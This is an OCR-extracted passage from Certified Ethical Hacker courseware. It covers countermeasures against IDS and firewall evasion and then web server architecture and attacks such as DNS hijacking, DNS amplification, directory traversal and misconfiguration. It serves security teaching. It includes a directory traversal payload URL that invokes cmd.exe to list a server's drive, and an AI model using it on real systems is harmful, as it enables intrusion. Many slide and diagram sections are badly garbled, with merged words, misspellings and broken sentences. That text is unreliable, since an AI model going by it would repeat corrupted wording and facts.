Exam 312-50 Certified Ethical Hacker

How to Defend Against IDS Evasion Shut down switch ports associated with known attack hosts

8 |

CEH Ensure packets that thetoIDSbe normalizes packetsorderand allows those reassembledfragmented in the proper

Perform an in-depth analysis of ambiguous network traffic for all possiblethreats

Define DNS server for client resolver in routers or similar network devices

Use TCP FIN or a Reset (RST) packetto terminate malicious TCP sessions

Harden the security of all communication devices such as modems and routers

Look for thea nop opcode other than 0x90to defend against the polymorphic shellcode problem

If possible, block ICMP TTL expired packetsat the external interface level and changethe TTL field to a large value

‘Train to identify attack devices patterns and regularly update/patch all theusers systems and network

Regularly update theantivirus signature database

Deploy IDS after a thorough analysis of the network topology, nature of networkttraffic, and number of hosts to monitor

Use a traffic normalization solution at the IDS to protect thesystem against evasions

Use a traffic normalizer to remove potential ambiguity from the packet streambefore it reaches the IDS

Storetheattack information (attackerIP, victim IP, timestamp, etc.) for futureanalysis Strcy Pro

How to Defend Against IDS Evasion =

Shut down switch ports associated with known attack hosts.

=

Perform an in-depth analysis of ambiguous network traffic for all possible threats.

=

Use TCP FIN or Reset (RST) packet to terminate malicious TCP sessions.

=

Look for the nop opcode other than 0x90 to defend against the polymorphic shellcode problem.

=

Train users to identify attack patterns and regularly update/patch all the systems and network devices.

=

Deploy IDS after a thorough analysis of the network topology, nature of network traffic, and number of hosts to monitor.

=

Use a traffic normalizer to remove potential ambiguity from the packet stream before it reaches the IDS.

=

Ensure that the IDS normalizes fragmented reassembled in the proper order.

=

Define DNS server for client resolver in routers or similar network devices.

=

Harden the security of all communication devices such as modems and routers.

=

If possible, block ICMP TTL expired packets at the external interface level and change the TTL field to a considerable value, ensuring that the end host always receives the packets.

=

Regularly update the antivirus signature database.

Module 12 Page 1764

packets and

allows those

packets to be

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

=

Use a traffic normalization solution at the IDS to protect the system from evasions.

=

Store the attack information (attacker IP, victim IP, timestamp, etc.) for future analysis.

=

Ensure that the packets are arriving from a path secured with IDS; if not, perform a deep analysis on packets arriving from non-IDS paths.

=

Ensure that snort rules are perfectly configured to avoid DoS attacks using snort false positives.

=

Periodically check for malicious script injection in snort rules directory.

=

Employ a hybrid signature-based exploit protection technique that comprises of advanced statistical and behavioral based analysis techniques to prevent IDS evasion using zero-day exploit.

Module 12 Page 1765

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

How to Defend Against Firewall Evasion The firewallshould shouldbe filtered be configured intruder cut such that the IP address ofan

| 3 |

Run regular risk queries to identify vulnerable firewall rules

Set the firewall ruleset to denyall traffic and enable only theservices required

9 |

Monitor user access to firewalls and control who can modify the firewall configuration

If possible, create a unique user ID torun the firewall services instead of running the services using the administrator or root ID

10 | Specify the source and destination IP addresses as well as the ports

Configurea remote syslog server and apply strict measures to protectit from malicious users

11 | Notify the security policy administrator about firewall changesand document them

Monitor firewall logs at regular intervals and investigate all suspicious log entries found

12 | Control physicalaceess tothe firewall

By default, disable all FTP connections to or from thenetwork

13 | Take regular backups of the firewall ruleset and configuration files

Catalog and review all inbound and outbound traffic allowed

14

through the trenal

|

Schedule regular firewall security7 audits' AlRights Reserved. Reproduction i Strictly Prohibited

How to Defend Against Firewall Evasion =

The firewall should be configured filtered out.

such that the IP address of an intruder should

be

=

Set the firewall rule set to deny all traffic and enable only the services required.

=

If possible, create a unique user ID to run the firewall services instead of running the services using the administrator or root ID.

=

Configure a remote syslog server and apply strict measures to protect it from malicious

=

Monitor firewall logs at regular intervals and investigate all suspicious log entries.

=

By default, disable all FTP connections to or from the network.

=

Catalog and review all inbound and outbound traffic allowed through the firewall.

=

Run regular risk queries to identify vulnerable firewall rules.

=

Monitor user access to firewalls and control who can modify the firewall configuration.

=

Specify the source and destination IP addresses as well as the ports.

=

Notify the security policy administrator about firewall changes and document them.

=

Control physical access to the firewall.

=

Take regular backups of the firewall ruleset and configuration files.

=

Schedule regular firewall security audits.

=

Look for integrated HTTPS/TLS inspection to defend against evasions.

users.

Module 12 Page 1766

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

=

Use HTTP Evader to run automated testing for suspected firewall evasions.

=

Use application connections.

Module 12 Page 1767

identification

to

block

malicious

applications

from

any

outbound

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Evading IDS, Firewalls, and Honeypots

Exam 312-50 Certified Ethical Hacker

Module Summary o

Q

inthis module, we have discussed the following: > IDS, IPS, firewall, and honeypot concepts and solutions Various techniques to bypass IDSs and firewalls > Various techniques to bypass NAC and endpoint security > Various IDS/Firewall evasion tools > How to detect and defeat honeypots »

We concluded with a detailed discussion on various countermeasures that should be

employed in order to prevent IDS/Firewall evasion attempts by threat actors

Q Inthe next module, we will discuss in detail how attackers, as well as ethical hackers and pen-testers, perform web server hacking to get valuable information such as credit card numbers and passwords is Stic Prohibited

Module Summary This module discussed different IDS, IPS, firewall, and honeypot concepts and solutions. It also described various techniques for bypassing IDS and firewalls. It also explained various techniques to bypass NAC and endpoint security. In addition, it illustrated various IDS/firewall evasion tools. Further, it explained how to detect and defeat honeypots. Finally, it ended with a detailed discussion of various countermeasures to be adopted to prevent IDS/Firewall evasion attempts by threat actors. In the next module, we will discuss in detail how attackers as well as ethical hackers and pen-

testers perform web server hacking to gain valuable information such as credit card numbers and passwords.

Module 12 Page 1768

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

C/EH

EC-Council MODULE

13

—_— HACKING WEB ——— SERVERS uy



=

;

I a

OFFICIAL CURRICULA

'

—_

-

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

CEH

o

o

LEARNING

OBJECTIVES

LO#01: Summarize Web Server Concepts

©

LO#04: Explain Web Server Attack Countermeasures

LO#02: Demonstrate Different Web Server Attacks

©

LO#05: Summarize Patch Management Concepts

LO#03: Explain Web Server Attack Methodology

Copyright © by

Learning Objectives Most organizations consider their web presence to be an extension of themselves. Organizations maintain websites associated with their business on the World Wide Web to establish their web presence. Web servers are a critical component of web infrastructure. A single vulnerability in web server configuration may lead to a security breach on websites. Therefore, web server security is critical to the normal functioning of an organization. At the end of this module, you will be able to do the following: =

Describe web server concepts

=

Perform various web server attacks

=

Describe web server attack methodology

=

Use different web server attack tools

=

Apply web server attack countermeasures

=

Use different web server security tools

=

Describe patch management concepts

Module 13 Page 1771

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

CEH LO#01: Summarize Web Server Concepts

Copyright © by

Web Server Concepts To understand web server hacking, it is essential to understand web server concepts, including what a web server is, how it functions, and other elements associated with it. This section provides a brief overview of a web server and its architecture. It will also explain common factors or mistakes that allow attackers to hack a web server. This section also describes the impact of attacks on web servers.

Module 13 Page 1772

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Hacking Web Servers

Web Server Operations ‘|@

CEH

Awebserver is a computer system that stores, processes, and delivers web pages

to clients via HTTP

ient-Server Web Server Operation

Components of a Web Server © Document Root: Stores critical HTML files related to the web pages of a domain name that will be served in response to the

Application DataStore

requests

© Server Root: Stores server's configuration, error, executable, and log files

rN

StaticData

i

Request

© Virtual Document Tree: Provides storage on a different machine or disk after the original diskis filled up

Servet Request

i ‘Application

Serviet Response

Web Container

© Virtual Hosting: Technique of hosting multiple domains or websites on the same server

Other Services

© Web Proxy: Proxy server that sits between the web client and web server to prevent IP blocking and maintain anonymity

| web cent | copyright © by

Jon ie Strictly Prohibited

Web Server Operations A web server is a computer system that stores, processes, and delivers web pages to global clients via the Hypertext Transfer Protocol (HTTP). In general, a client initiates a communication process through HTTP requests. When a client desires to access any resource such as web pages, photos, and videos, the client’s browser generates an HTTP request that is sent to the web server. Depending on the request, the web server collects the requested information/content from the data storage or application servers and responds to the client’s request with an appropriate HTTP response. If a web server cannot find the requested information, then it generates an error message.

Static Data Request

A

Static Data Response Vv

Application

Server

Servlet Response HTTP Request

: HTTP } Response

Web Container Other Services

Figure 13.1: Typical client-server communication in web server operation

Module 13 Page 1773

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Components of a Web Server

Aweb server consists of the following components: Document

Root

The document root is one of the root file directories of the web server that stores critical HTML files related to the web pages of a domain name, which will be sent in

response to requests.

For example, if the requested URL is www.certifiedhacker.com and the document root is named “certroot” and is stored in the directory /admin/web, then /admin/web/certroot is the document directory address. If the complete request is www.certifiedhacker.com/P-folio/index.html, the server will search for the file path /admin/web/certroot/P-folio/index.html. Server Root It is the top-level root directory under the directory tree in which the server's configuration and error, executable, and log files are stored. It consists of the code that implements the server. The server root, in general, consists of four files. One file is dedicated to the code that implements the server, while the other three are subdirectories, namely, -conf, -logs, and -cgi-bin, which are used for configuration information, logs, and executables, respectively. Virtual Document Tree A virtual document tree provides storage on a different machine or disk after the original disk becomes full. It is case-sensitive and can be used to provide object-level security. In the above example under document root, for a _ request of www.certifiedhacker.com/P-folio/index.html, the server can also search for the file path /admin/web/certroot/P-folio/index.html if the directory admin/web/certroot is stored in another disk.

Virtual Hosting It is a technique of hosting multiple domains or websites on the same server. This technique allows the sharing of resources among various servers. It is employed in largescale companies, in which company resources are intended to be accessed and managed globally. The following are the types of virtual hosting: o

Name-based hosting

o

Internet Protocol (IP)-based hosting

©

Port-based hosting

Module 13 Page 1774

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Hacking Web Servers

=

Web Proxy A proxy server is located between the web client and web server. Owing to the placement of web proxies, all requests from clients are passed on to the web server through the web proxies. They are used to prevent IP blocking and maintain anonymity.

Open-source Web Server Architecture Open-source web server architecture typically uses Linux, Apache, called the LAMP software bundle, as the principal components. The following architecture:

are

the

functions

of the

principal

components

MySQL,

and

in open-source

PHP, web

often server

=

Linux is the operating system (OS) of the web server and provides a secure platform

=

Apache

=

MySQL is a relational database used to store the content and configuration information of the web server

=

PHP is the application layer technology used to generate dynamic web content

response

is the component

of the web

Site Users

server that

handles

each

Site Admin

HTTP

request

and

Attacks

=pobs | 2h pod

4

Internet

Linux

:

File system

RNAN 4

z

Applications

beg cencennesl



Bg scccnsed

v

Apache

Pret

~

PHP

PUREE

.

2

Compiled Extension

Email

eeeeeeeeey

¥

mysql

4

FE

Figure 13.2: Functions of the principal components of the open-source web server architecture

Module 13 Page 1775

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

IIS Web Server Architecture The Internet Information Service (IIS) is a web server application developed by Microsoft for Windows. IIS for Windows Server is a flexible, secure, and easy-to-manage web server for hosting anything on the web. It supports HTTP, HTTP Secure (HTTPS), File Transfer Protocol (FTP), FTP Secure (FTPS), Simple Mail Transfer Protocol (SMTP), and Network News Transfer Protocol (NNTP). It has several components, including a protocol listener such as HTTP.sys and services such as the World Wide Web Publishing Service (WWW Service) and Windows Process Activation Service (WAS). Each component functions in application and web server roles. These functions may include listening to requests, managing processes, and reading configuration files. Client

Stack

Svchost.exe

¥

Windows Activation Service (WAS)

WWW Service External Apps

application hestconfia “

a

a

2,

a

ry i %

> 4 =

>

HTTP Protocol Stack (HTTP.SYS)

Application Pool

7""7"""""" ie

Web Server Core Begin request processing, authentication, authorization, cache resolution, handler

7 Modules Native Anonymous authentication, managed engine,IIS certificate mapping,

AppDomain

execution, release state, update cache, update log, and end request processing

document, HTTP cache, HTTP errors, and HTTP logging

Authenticsti ‘uthentication

mapping, handler pre-

static file, default

Managed Modules Forms

Figure 13.3: Components of the IIS web server architecture

Module 13 Page 1776

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Web Server Security Issues

CEH

‘@

Attackers usually target software vulnerabilities and configuration errors to compromise web servers

‘@

Network and OS level attacks can be well defended using proper network security measures such as firewalls, IDS, etc. However, web servers can be accessed from anywhere via the Internet, which renders them highly

vulnerable to attacks

Custom Web Applications

[},_Stack7

ry

Third-party Components ~~

9

Web Server

Open Source/Commercial Apache/Microsoft IIS

ySQl/Ms Sal

Database

Operating System £7

© windows/tinux/macos juter/Switch

Security

Impact of Web Server Attacks

Business Logic Flaws

IPs / IDS

© Compromise of user accounts @ Website defacement

© Secondary attacks from the website © Root access to other applications or

servers

©

=

Data tampering and data theft

© Reputational damage of the company

Web Server Security Issues A web server is a hardware/software application that hosts websites and makes them accessible over the Internet. A web server, along with a browser, successfully implements client-server model architecture. In this model, the web server plays the role of the server, and the browser acts as the client. To host websites, a web server stores the web pages of websites and delivers a particular web page upon request. Each web server has a domain name and an IP address associated with that domain name. A web server can host more than one website. Any computer can act as a web server if it has specific server software (a web server program) installed and is connected to the Internet.

Web servers are chosen based on their capability to handle server-side programming, security characteristics, publishing, search engines, and site-building tools. Apache, Microsoft IIS, Nginx, Google, and Tomcat are some of the most widely used web server software. An attacker usually targets vulnerabilities in the software component and configuration errors to compromise web servers.

a

Website 1

Internet

Web Server

Browser on User’s Computer

Website 2

Figure 13.4: Conceptual diagram of a web server: the user visits websites hosted on a web server

Module 13 Page 1777

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Organizations can defend most network-level and OS-level attacks by adopting network security measures such as firewalls, intrusion detection systems (IDSs), and intrusion prevention systems (IPSs) and by following security standards and guidelines. This forces attackers to turn their attention to web-server- and web-application-level attacks because a web server that hosts web applications is accessible from anywhere over the Internet. This makes web servers an attractive target. Poorly configured web servers can create vulnerabilities in even the most carefully designed firewall systems. Attackers can exploit poorly configured web servers with known vulnerabilities to compromise the security of web applications. Furthermore, web servers with known vulnerabilities can harm the security of an organization. As shown in below figure, organizational security includes seven levels from stack 1 to stack 7. Custom Web Applications

wf,

@>

Third-party Components

Stack 6

Database

7

Operating System

Security

e

Business Logic Flaws

8

Open Source/Commercial

Apache/Microsoft IIS

4

Stack 5

Web Server

Network

Stack 7

Stack 4

Be

Stacks

Oracle/MySQL/MS SQL

(0,0) Windows/Linux/macOS

ere

ray



Router/Switch

RR

IPS / IDS

Figure 13.5: Levels of organizational security

Common Goals behind Web Server Hacking Attackers perform web server attacks with certain goals in mind. These goals may be either technical or non-technical. For example, attackers may breach the security of a web server and steal sensitive information for financial gains or merely for the sake of curiosity. The following are some common goals of web server attacks: =

Stealing credit-card details or other sensitive credentials using phishing techniques

=

Integrating the server into a botnet to perform denial of service (DoS) or distributed DoS (DDoS) attacks

=

Compromising a database

=

Obtaining closed-source applications

=

Hiding and redirecting traffic

=

Escalating privileges

Some attacks are performed for personal reasons, rather than financial gains: =

For pure curiosity

Module 13 Page 1778

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

=

For completing a self-set intellectual challenge

=

For damaging the target organization’s reputation

Dangerous Security Flaws Affecting Web Server Security A web server configured by poorly trained system administrators may have security vulnerabilities. Inadequate knowledge, negligence, laziness, and inattentiveness toward security can pose the greatest threats to web server security. The following are some common oversights that make a web server vulnerable to attacks: =

Failing to update the web server with the latest patches

=

Using the same system administrator credentials everywhere

=

Allowing unrestricted internal and outbound traffic

=

Running unhardened applications and servers

Impact of Web Server Attacks Attackers can cause various kinds of damage to an organization by attacking a web server. The following are some of the types of damage that attackers can cause to a web server. =

Compromise of user accounts: Web server attacks mostly focus on compromising user accounts. If the attacker compromises a user account, they can gain a large amount of useful information. The attacker can use the compromised user account to launch further attacks on the web server.

=

Website defacement: Attackers can completely change the appearance of a website by replacing its original data. They deface the target website by changing the visuals and displaying different pages with messages of their own.

=

Secondary attacks from the website: An attacker who compromises a web server can use the server to launch further attacks on various websites or client systems.

=

Root access to other applications or server: Root access is the highest privilege level to log in to a server, irrespective of whether the server is a dedicated, semi-dedicated, or virtual private server. Attackers can perform any action once they attain root access to the server.

=

Data tampering: An attacker can alter or delete the data of a web server and even replace the data with malware to compromise users who connect to the web server.

=

Data theft: Data are among the primary assets of an organization. Attackers can attain access to sensitive data such as financial records, future plans, or the source code of a

program.

=

Damage reputation of the company: Web server attacks may expose the personal information of a company’s customers to the public, damaging the reputation of the company. Consequently, customers lose faith in the company and become afraid of sharing their personal details with the company.

Module 13 Page 1779

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Why are Web Servers Compromised?

clEH

Improper file and directory permissions

@ Unnecessary default, backup, or sample files

Server installation with default settings

© Misconfigurationsin web server, operating systems, and networks

Enabling of unnecessary services, . including content

management and remote administration

Bugs 8 in server software, OS, and web PP! applications

Security conflicts with business ease-of-use case

| Misconfigured SSL certificates and encryption settings

Lack of proper security policies, procedures, and maintenance

@ Administrative or debugging functions that are enabled or accessible on web servers

Improper authentication with external systems

© Use of self-signed certificates and default certificates

Default accounts having default passwords, or no passwords

© Not using dedicated server for web services

Why are Web Servers Compromised? There are inherent security risks associated with web servers, the local area networks (LANs) that host websites, and the end users who access these websites using browsers.

Webmaster's perspective: From a webmaster’s perspective, the greatest security concern is that a web server can expose the LAN or corporate intranet to threats posed by the Internet. These threats may be in the form of viruses, Trojans, attackers, or the

compromise of data. Bugs in software programs are often sources of security lapses. Web servers, which are large and complex devices, also have these inherent risks. In addition, the open architecture of web servers allows arbitrary scripts to run on the server side while responding to remote requests. Any Common Gateway Interface (CGI) script installed in the web server may contain bugs that are potential security holes. Network administrator's perspective: From a network administrator's perspective, a poorly configured web server causes potential holes in the LAN’s security. While the objective of the web server is to provide controlled access to the network, excess control

can

make

the web

almost

impossible

to use.

In an intranet

environment,

the

network administrator must configure the web server carefully so that legitimate users are recognized and authenticated, and groups of users are assigned distinct access privileges. End user’s perspective: Usually, the end user does not perceive any immediate threat, because surfing the web appears both safe and anonymous. However, active content, such as ActiveX controls and Java applets, make it possible for harmful applications, such as viruses, to invade the user’s system. In addition, active content from a website that is displayed by the user’s browser can be used as a conduit for malicious software to bypass the firewall system and permeate the LAN. Module 13 Page 1780

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

The following are some oversights that can compromise a web server: =

Improper file and directory permissions

=

Installing the server with default settings

=

Unnecessary services enabled, including content management and remote administration

=

Security conflicts with the business’ ease-of-use requirements

=

Lack of proper security policy, procedures, and maintenance

=

Improper authentication with external systems

=

Default accounts with default or no passwords

=

Unnecessary default, backup, or sample files

=

Misconfigurations in the web server, OS, and networks

=

Bugs in server software, OS, and web applications

=

Misconfigured Secure Sockets Layer (SSL) certificates and encryption settings

=

Administrative or debugging functions that are enabled or accessible on web servers

=

Use of self-signed certificates and default certificates

=

Not using dedicated server for web services

Module 13 Page 1781

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

CEH LO#02: Demonstrate Different Web Server Attacks

Copyright © by

Web Server Attacks An attacker can use many techniques to compromise a web server, such as DoS/DDoS, Domain Name System (DNS) server hijacking, DNS amplification, directory traversal, man in the middle (MITM)/sniffing, phishing, website defacement, web server misconfiguration, HTTP response splitting, web cache poisoning, Secure Shell (SSH) brute force, and web server password cracking. This section describes these attack techniques in detail.

Module 13 Page 1782

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

DNS Server Hijacking ‘@

clEH

Attacker compromises the DNS server and changes the DNSsettings so thatall the requests coming towards the target web

Attacker : P

server are redirected to his/her own malicious server

E Redirects user request to ‘the malicious website

‘compromises DNS server and changes the DNS settings DNS server checks the respective DNS

(3) mapping for the requested dom:

DNS Server (Target)

@

B

z

a .

Users (Victim)

Legitimate Site

DNS Server Hijacking The Domain Name System (DNS) resolves a domain name to its corresponding IP address. A user queries the DNS server with a domain name, and the DNS server responds with the corresponding IP address. In DNS server hijacking, an attacker compromises a DNS server and changes its mapping settings to redirect toward a rogue DNS server that would redirect the user’s requests to the attacker’s rogue server. Consequently, when the user enters a legitimate URL in a browser, the settings will redirect to the attacker’s fake site.

ser request to

Attacker

the malicious website

@ theseverance DNS settings =.

Fake Site

Compromises DNS

DNS server checks the respective DNS.



DNS Server (Target)

Users (Victim)

1] L]

Legitimate Site

Figure 13.6: DNS server hijacking

Module 13 Page 1783

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

DNS Amplification Attack ‘©

CE H

Attacker takes advantage of the DNS recursive method of DNS redirection to perform DNS amplification attacks

What is the IP Address of certifiedhacker.com? Please reply to my IP address

~~

User's PC

Here's the IP ‘Address of certifiedhacker.com

Where can find the IP Address of certifiedhacker.com?

ae

should have the answer

User's Primary DNS Server (Recursion Allowed)

Root Servers

Primary DNS Server of certifiedhacker.com ins)

Pan

What is the IP Address of

‘What is the IP Address of

certfiedhackercom?

certifiedhackercom?

Primary DNS Serverof

Recursive DNS Method

com NameSpace

certifiedhacker.com fon Is Sticty Prohibited

Copyright © by

DNS Amplification Attack (Cont’d)

CE H

|@ Attacker uses compromised PCs with spoofed IP addresses to amplify the DDoS attacks on victims’ DNS server by exploiting the DNS recursive method ‘Where can | find the IP Address

What isthe IP Addressof

e>| User'sa Primary DNS Servers

Sends signals to activate bots

.|

e

(Recursion Allowed) (Not authoritativefor

Root Servers

certifiedhacker.com)

ca:) .com NameSpace

should have the answer

Here is the IP Address of certifiedhacker.com

SS Primary DNS Server of certifiedhacker.com

Copyright © by

Here is the IP Address of certifiedhacker.com

SS Victim's Server Victim's IP Address Jon ie Strictly Prohibited

DNS Amplification Attack Recursive DNS query is a method of requesting DNS mapping. The query goes through servers recursively until it fails to find the specified domain name to IP address mapping.

Module 13 Page 1784

DNS

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

The following are the steps involved illustrated in the below figure. =

in processing

recursive

DNS

requests; these steps are

Step 1:

Users who desire to resolve a domain name to its corresponding IP address send a DNS query to the primary DNS server specified in its Transmission Control Protocol (TCP)/IP properties. =

Steps 2 to 7:

If the requested DNS mapping does not exist on the user’s primary DNS server, the server forwards the request to the root server. The root server forwards the request to the .com namespace, where the user can find DNS mappings. This process repeats recursively until the DNS mapping is resolved. =

Step 8: Ultimately, when the system finds the primary DNS server for the requested mapping, it generates a cache for the IP address in the user’s primary DNS server. What is the IP Address

DNS

Where can | find the

Hereis the IP Address of certifiedhacker.com

Ido not know but -com NameSpace should have the answer User's Primary DNS Server

(Recursion Allowed)

e

F

Primary DNS Server of

certifiedhacker.com

Primary DNS Server of certifiedhacker.com

.com NameSpace Figure 13.7: Recursive DNS query

Attackers exploit recursive DNS queries to perform a DNS amplification attack that results in

DDoS attacks on the victim’s DNS server.

The following are the steps involved in a DNS amplification attack; these steps are illustrated in

the below figure. =

Step 1: The attacker instructs compromised hosts (bots) to make DNS queries in the network.

=

Step 2: All the compromised hosts spoof the victim’s IP address and send DNS query requests to the primary DNS server configured in the victim’s TCP/IP settings.

Module 13 Page 1785

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers =

Exam 312-50 Certified Ethical Hacker

Steps 3 to 8:

If the requested DNS mapping does not exist on the victim’s primary DNS server, the server forwards the requests to the root server. The root server forwards the request to the .com or respective top-level domain (TLD) namespaces. This process repeats recursively until the victim’s primary DNS server resolves the DNS mapping request. =

Step 9:

After the primary DNS server finds the DNS mapping for the victim’s request, it sends a DNS mapping response to the victim’s IP address. This response goes to the victim because bots use the victim’s IP address. The replies to copious DNS mapping requests from the bots result in DDoS on the victim’s DNS server.

BES Sends signals to activate bots

e

a serene.

Botnet compromised PCs

4G

” ertifiedhacker com knows it

Attacker

Where can find the IP Address

What is the IP Address of

User's Primary DNS Servers |} (Recursion Allowed)

but com NameSpace should have the answer

|_ (Not authoritative for certifiedhacker.com)

Root Servers

E Address of 5 certifiedhacker.com

ine F com NameSpace

Primary DNS Server of certifiedhacker.com

im’s Server

Victim's IP Address

Figure 13.8: DNS amplification attack

Module 13 Page 1786

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Directory Traversal Attacks ‘@

Indirectory traversal attacks, attackers use the ../ (dot-dot-slash) sequence to access restricted directories

outside the web server root directory ‘@

Attackers can use the trial and error method to navigate outside the root directory and access sensitive information in the system

4 & http://server.com/scri i pts/..%5c../ Windows/ ‘System32/ wae cmd.exe?/c +dirtc:\

Volume in drive Chas no label, Volume Serial Number is D4SE-9FEE

Directory ofC:\ oa/or/z022 11:31am 04/28/2022 06:43PM 03/21/2022 03:10PM 04/27/2022 08:54PM 03/21/2022 03:10PM 04/11/2022 03:16 AM 04/25/2022 05:25 PM 03/07/2022 03:38 PM

(04/27/2022 09:36PM





1026.end 123 text. —_OAUTOEXEC.BAT CATALINA HOME OCONFIG:SYS Documentsand Settings Downloads Intel

om Qcomay domoate 2 Gino Brows Ses GO support

Program Files

(02/26/2022 02:36AM Snort 04/28/2022 09:50AM WINDOWS (04/25/2022 02:03PM 569,344 WinDump.exe (3) 570,368 bytes

Copyright © by

AlRights Reserved. Reproduction f Sty Prohibited

Directory Traversal Attacks An attacker may be able to perform a directory traversal attack owing to a vulnerability in the code of a web application. In addition, poorly patched or configured web server software can make the web server vulnerable to a directory traversal attack. The design of web servers limits public access to some extent. Directory traversal is the exploitation of HTTP through which attackers can access restricted directories and execute commands outside the web server’s root directory by manipulating a Uniform Resource Locator (URL). In directory traversal attacks, attackers use the dot-dot-slash (../) sequence to access restricted directories outside the web server’s root directory. Attackers can use the trial-anderror method to navigate outside the root directory and access sensitive information in the

system.

An attacker exploits the web server software (web server program) to perform directory traversal attacks. The attacker usually performs this attack with the help of a browser. A web server is vulnerable to this attack if it accepts input data from a browser without proper validation.

Module 13 Page 1787

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

http://server.com/scri

pts/..%5c../Windows/ System32/cmd.exe?/c +dirtc:\

Exam 312-50 Certified Ethical Hacker

Volume in drive C has no label. Volume Serial Number is D4SE-SFEE Directory of C:\ (04/02/2022 11:31AM 1,024 rnd 0123:text 04/28/2022 06:43 PM 03/21/2022 03:10PM OAUTOEXEC.BAT

04/27/2022 08:54PM ‘CATALINA_HOME 03/21/2022 03:10PM OCONFIG.SYS Documents and Settings 04/11/2022 09:16 AM

(04/25/2022 05:25PM Downloads 03/07/2022 03:38 PM Intel 04/27/2022 09:36 PM Program Files

02/26/2022 02:36 AM Snort

04/28/2022 09:50 AM winoows (04/25/2022 02:03 PM 569,344 WinDump.exe 7File(s) _570,368bytes 13 Dir(s) 13,432,115,200bytes free

1B dowedoads 8 B images Brews B sorts B apport

Figure 13.9: Directory traversal attack

Module 13 Page 1788

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures Hacking Web Servers

Exam 312-50 Certified Ethical Hacker

Website Defacement ‘@

Web defacement occurs when an

intruder maliciously alters the visual appearance of a web page

ss

veep

2eoe

ntpivaww.certiiednacker

verbose error messages

php.ini file display_error = on ignore repeated errors = Off

copyright © by

AlRights Reserved. Reproduction f Sty Prohibited

Web Server Misconfiguration Web server misconfiguration refers to the configuration weaknesses in web infrastructure that can be exploited to launch various attacks on web servers, such as directory traversal, server intrusion, and data theft. The following are some web server misconfigurations: =

Verbose debug/error messages

=

Anonymous or default users/passwords

=

Sample configuration and script files

=

Remote administration functions

=

Unnecessary services enabled

=

Misconfigured/default SSL certificates

An Example of a Web Server Misconfiguration “Keeping the server configuration secure requires vigilance” Project (OWASP)

—Open Web Application Security

